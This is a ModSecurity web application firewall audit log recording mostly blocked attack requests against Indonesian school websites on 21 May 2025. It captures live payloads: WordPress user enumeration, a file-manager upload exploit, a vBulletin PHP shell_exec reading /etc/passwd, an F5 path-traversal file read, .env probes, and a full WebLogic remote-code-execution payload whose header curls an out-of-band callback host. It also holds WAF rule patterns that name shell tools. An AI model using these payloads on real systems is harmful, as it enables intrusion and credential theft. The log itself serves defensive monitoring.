Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a7761356-Z-- --de7e412f-A-- [21/May/2025:16:58:01 +0700] aC2jqXZGSt58M5vv3gmkqgAAAAY 103.236.140.4 56206 103.236.140.4 8181 --de7e412f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.164.23.56 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.164.23.56 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --de7e412f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --de7e412f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821481478071 2799 (- - -) Stopwatch2: 1747821481478071 2799; combined=1159, p1=406, p2=725, p3=0, p4=0, p5=28, sr=62, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --de7e412f-Z-- --58ea331b-A-- [21/May/2025:16:59:44 +0700] aC2kECioYDAgD0WHUjTYogAAAFc 103.236.140.4 57756 103.236.140.4 8181 --58ea331b-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (Fedora; Linux x86_64; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164789266 --58ea331b-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --58ea331b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --58ea331b-E-- --58ea331b-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. 
[file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821584540479 3678 (- - -) Stopwatch2: 1747821584540479 3678; combined=2509, p1=385, p2=2096, p3=0, p4=0, p5=27, sr=65, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --58ea331b-Z-- --4b8cf92c-A-- [21/May/2025:16:59:44 +0700] aC2kEHZGSt58M5vv3gmlLgAAAAA 103.236.140.4 57770 103.236.140.4 8181 --4b8cf92c-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (Debian; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 161474793 --4b8cf92c-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --4b8cf92c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --4b8cf92c-E-- --4b8cf92c-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. 
[file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821584555449 1890 (- - -) Stopwatch2: 1747821584555449 1890; combined=596, p1=389, p2=181, p3=0, p4=0, p5=26, sr=87, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4b8cf92c-Z-- --1b69a90e-A-- [21/May/2025:16:59:44 +0700] aC2kEHZGSt58M5vv3gmlLQAAAAk 103.236.140.4 57762 103.236.140.4 8181 --1b69a90e-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:108.0) Gecko/20100101 Firefox/108.0 Content-Type: x-application/hessian X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 164789269 --1b69a90e-C-- cH --1b69a90e-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --1b69a90e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1747821584553838 3901 (- - -) Stopwatch2: 1747821584553838 3901; combined=2312, p1=498, p2=1739, p3=23, p4=27, p5=25, sr=75, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1b69a90e-Z-- --a76a1020-A-- [21/May/2025:16:59:44 +0700] aC2kEHZGSt58M5vv3gmlLwAAABY 103.236.140.4 57774 103.236.140.4 8181 --a76a1020-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (ZZ; Linux i686; rv:134.0) Gecko/20100101 Firefox/134.0 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0mbkqa4kqtm561jt3n0aor8371wiwy64.oast.fun X-Forwarded-For: 154.26.179.43 Cookie: X-Varnish: 167545917 --a76a1020-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? 
new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --a76a1020-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a76a1020-E-- --a76a1020-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747821584562097 2210 (- - -) Stopwatch2: 1747821584562097 2210; combined=782, p1=449, p2=305, p3=0, p4=0, p5=27, sr=71, sw=1, l=0, gc=0 
Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a76a1020-Z-- --d8213a2b-A-- [21/May/2025:17:34:23 +0700] aC2sL4v3pT1iV0OxjLQnBwAAAIc 103.236.140.4 56780 103.236.140.4 8181 --d8213a2b-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 128.199.89.172 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 128.199.89.172 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d8213a2b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d8213a2b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747823663243637 4296 (- - -) Stopwatch2: 1747823663243637 4296; combined=2208, p1=632, p2=1541, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d8213a2b-Z-- --48d1885a-A-- [21/May/2025:17:46:57 +0700] aC2vIXZGSt58M5vv3gm38AAAAAA 103.236.140.4 37628 103.236.140.4 8181 --48d1885a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 45.138.16.25 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 45.138.16.25 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept: */* --48d1885a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --48d1885a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747824417144828 794 (- - -) Stopwatch2: 1747824417144828 794; combined=306, p1=267, p2=0, p3=0, p4=0, p5=39, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --48d1885a-Z-- --9bc1351d-A-- [21/May/2025:18:07:54 +0700] aC20CiioYDAgD0WHUjTxtAAAAEY 103.236.140.4 52910 103.236.140.4 8181 --9bc1351d-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 118.179.221.61 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.179.221.61 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9bc1351d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9bc1351d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747825674931508 3405 (- - -) Stopwatch2: 1747825674931508 3405; combined=1429, p1=476, p2=920, p3=0, p4=0, p5=33, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9bc1351d-Z-- --62b71a73-A-- [21/May/2025:18:13:57 +0700] aC21dXZGSt58M5vv3gnFkQAAABE 103.236.140.4 57384 103.236.140.4 8181 --62b71a73-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.79.25.94 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.79.25.94 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --62b71a73-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --62b71a73-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747826037742879 2781 (- - -) Stopwatch2: 1747826037742879 2781; combined=1225, p1=426, p2=768, p3=0, p4=0, p5=30, sr=73, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --62b71a73-Z-- --c166a371-A-- [21/May/2025:18:24:37 +0700] aC239SioYDAgD0WHUjT3IQAAAEw 103.236.140.4 36822 103.236.140.4 8181 --c166a371-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 157997103 --c166a371-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --c166a371-E-- --c166a371-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747826677361067 2388 (- - -) Stopwatch2: 1747826677361067 2388; combined=610, p1=448, p2=117, p3=0, p4=0, p5=44, sr=75, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c166a371-Z-- --cda0f83d-A-- [21/May/2025:18:24:38 +0700] aC239iioYDAgD0WHUjT3IwAAAFM 103.236.140.4 36822 103.236.140.4 8181 --cda0f83d-B-- GET /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 154.26.179.43 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Mac OS X 13_2) AppleWebKit/537.36 (KHTML, like Gecko) Edge/119.0 Safari/537.36 Accept: */* Accept-Language: en Cookie: X-Forwarded-For: 154.26.179.43 Accept-Encoding: gzip X-Varnish: 157997106 --cda0f83d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --cda0f83d-E-- --cda0f83d-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/f5-release"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747826678313682 2243 (- - -) Stopwatch2: 1747826678313682 2243; combined=653, p1=441, p2=169, p3=0, p4=0, p5=42, sr=76, sw=1, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cda0f83d-Z-- --94ce8b07-A-- [21/May/2025:18:34:55 +0700] aC26Xxpv_mIXt2pDBOpUmwAAANE 103.236.140.4 44226 103.236.140.4 8181 --94ce8b07-B-- GET /.env HTTP/1.0 Host: www.smkn22-jkt.sch.id X-Real-IP: 31.56.56.153 X-Forwarded-Host: www.smkn22-jkt.sch.id X-Forwarded-Server: www.smkn22-jkt.sch.id X-Forwarded-For: 31.56.56.153 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --94ce8b07-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --94ce8b07-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747827295852805 862 (- - -) Stopwatch2: 1747827295852805 862; combined=342, p1=303, p2=0, p3=0, p4=0, p5=39, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --94ce8b07-Z-- --d9ac0d3f-A-- [21/May/2025:18:53:18 +0700] aC2-rnZGSt58M5vv3gnXXgAAAAY 103.236.140.4 57618 103.236.140.4 8181 --d9ac0d3f-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 116.90.229.98 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 116.90.229.98 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d9ac0d3f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9ac0d3f-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747828398214458 3138 (- - -) Stopwatch2: 1747828398214458 3138; combined=1397, p1=413, p2=889, p3=0, p4=0, p5=95, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d9ac0d3f-Z-- --9d9f5d77-A-- [21/May/2025:19:06:56 +0700] aC3B4Iv3pT1iV0OxjLREEwAAAI8 103.236.140.4 39368 103.236.140.4 8181 --9d9f5d77-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.97.201.80 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.97.201.80 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9d9f5d77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9d9f5d77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747829216550658 2712 (- - -) Stopwatch2: 1747829216550658 2712; combined=1220, p1=411, p2=778, p3=0, p4=0, p5=31, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9d9f5d77-Z-- --f086f83c-A-- [21/May/2025:19:17:18 +0700] aC3ETov3pT1iV0OxjLRHOwAAAI4 103.236.140.4 46892 103.236.140.4 8181 --f086f83c-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 103.156.92.159 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 103.156.92.159 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30 Accept: */* --f086f83c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f086f83c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1747829838225537 768 (- - -) Stopwatch2: 1747829838225537 768; combined=300, p1=264, p2=0, p3=0, p4=0, p5=36, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
